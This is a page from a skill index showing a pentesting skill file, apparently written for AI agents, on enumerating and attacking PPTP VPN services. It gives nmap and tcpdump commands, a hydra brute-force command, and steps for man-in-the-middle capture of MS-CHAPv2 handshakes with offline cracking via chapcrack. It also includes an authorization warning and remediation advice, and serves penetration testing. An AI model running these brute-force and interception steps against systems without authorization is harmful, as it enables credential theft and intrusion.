OpenSkillIndex← back to search

Hacktricks-skills pptp-pentesting

How to enumerate and pentest PPTP (Point-to-Point Tunneling Protocol) services on port 1723. Use this skill whenever the user mentions PPTP, port 1723, GRE protocol, remote access tunneling, or needs to assess PPTP security during authorized penetration testing. This skill covers enumeration, brute force attacks, and known PPTP vulnerabilities.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/1723-pentesting-pptp/SKILL.MD
source content

PPTP Pentesting

Point-to-Point Tunneling Protocol (PPTP) is a remote access protocol that uses TCP port 1723 for control traffic and IP protocol 47 (GRE) for encrypted data transmission. This skill helps you enumerate and assess PPTP services during authorized penetration testing engagements.

⚠️ Authorization Required: Only use these techniques on systems you own or have explicit written permission to test.

When to Use This Skill

Use this skill when:

  • You discover port 1723 open during network scanning
  • You need to assess PPTP VPN security
  • You're testing remote access configurations
  • You encounter GRE protocol (IP 47) in firewall rules
  • You need to understand PPTP vulnerabilities and attack vectors

Enumeration

Basic Service Detection

Start by confirming PPTP is running and gathering service information:

# Basic PPTP enumeration
nmap -Pn -sSV -p1723 <target-ip>

# More detailed scan including GRE protocol
nmap -Pn -sV -sT -p1723 --script ppp-pptp <target-ip>

# Full scan to see all open ports and services
nmap -Pn -sC -sV -p1723 <target-ip>

Check GRE Protocol

PPTP requires GRE (IP protocol 47) to function. Verify it's allowed:

# Check if GRE is open
nmap -Pn -sA -p1723 <target-ip>

# Or use tcpdump to monitor GRE traffic
tcpdump -i <interface> 'ip[9] == 47'

Vulnerability Assessment

Known PPTP Weaknesses

PPTP has several well-documented vulnerabilities:

  1. MS-CHAPv2 Weakness: The MS-CHAPv2 authentication protocol used by PPTP can be cracked offline using tools like 
    chapcrack
  2. GRE Encryption Issues: GRE provides no encryption by default, only encapsulation
  3. Protocol Design Flaws: PPTP was designed in the 1990s and has fundamental security weaknesses

Reference Resources

Attack Vectors

Brute Force Authentication

If PPTP accepts connections, attempt to enumerate valid credentials:

# Using p0f or similar tools to fingerprint
# Then attempt credential attacks with appropriate tools

# Example with hydra (if available)
hydra -l <username> -P <wordlist> pptp://<target-ip>

Capture MS-CHAPv2 Handshake

To crack PPTP credentials, you need to capture the MS-CHAPv2 handshake:

  1. Set up a man-in-the-middle position (requires network access)
  2. Capture the authentication exchange using packet capture tools
  3. Extract the challenge/response pairs
  4. Crack offline using chapcrack or similar tools
# Capture PPTP traffic
tcpdump -i <interface> -s 0 -w pptp_capture.pcap host <target-ip> and port 1723

# Extract MS-CHAPv2 data (requires specialized tools)
# Then crack with:
chapcrack -c <challenge> -r <response> -w <wordlist>

Testing Checklist

When assessing PPTP security, verify:

  • Port 1723 is accessible
  • GRE protocol (IP 47) is allowed through firewalls
  • Service version and banner information
  • Authentication mechanism (MS-CHAPv1/v2)
  • Whether encryption is actually enabled
  • Default or weak credentials
  • Certificate validation (if using EAP)

Reporting

When documenting PPTP findings:

  1. Risk Level: PPTP is generally considered high risk due to inherent protocol weaknesses
  2. Recommendation: Migrate to more secure protocols (OpenVPN, WireGuard, IKEv2)
  3. Evidence: Include nmap output, captured handshakes (if applicable), and successful authentication attempts
  4. Remediation: Disable PPTP, implement modern VPN solutions

Tools Reference

ToolPurpose
nmapService enumeration and version detection
tcpdumpTraffic capture for handshake extraction
chapcrackMS-CHAPv2 credential cracking
hydraBrute force authentication attacks
p0fProtocol fingerprinting

Important Notes

  • PPTP is deprecated and should not be used for sensitive data
  • Even with strong passwords, MS-CHAPv2 can be vulnerable to offline attacks
  • GRE traffic may be blocked by modern firewalls and NAT devices
  • Many modern systems no longer support PPTP by default

Next Steps

After initial enumeration:

  1. Document all findings
  2. Attempt authorized authentication testing
  3. Capture handshakes if MITM position is available
  4. Assess the impact of any successful attacks
  5. Recommend migration to secure alternatives